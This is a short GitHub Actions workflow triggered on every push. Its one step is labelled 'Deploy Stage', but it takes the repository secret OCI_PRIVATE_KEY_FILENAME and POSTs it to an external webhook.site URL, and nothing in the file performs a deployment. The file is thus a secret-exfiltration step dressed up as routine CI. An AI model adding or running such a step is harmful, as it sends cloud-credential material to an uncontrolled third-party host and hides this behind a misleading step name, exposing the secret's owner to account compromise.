name: test2
on: [push]
jobs:
  debug:
    name: SMSE
    runs-on: ubuntu-latest
    steps:
      - name: Deploy Stage
        env:
          OCI_PRIVATE_KEY_FILENAME: ${{ secrets.OCI_PRIVATE_KEY_FILENAME }}
        uses: fjogeleit/http-request-action@v1
        with:
          url: 'https://webhook.site/0a87d2f2-606b-4076-a85f-703409c46e78'
          method: 'POST'
          customHeaders: '{"Content-Type": "application/json"}'
          data: ${{ secrets.OCI_PRIVATE_KEY_FILENAME }}
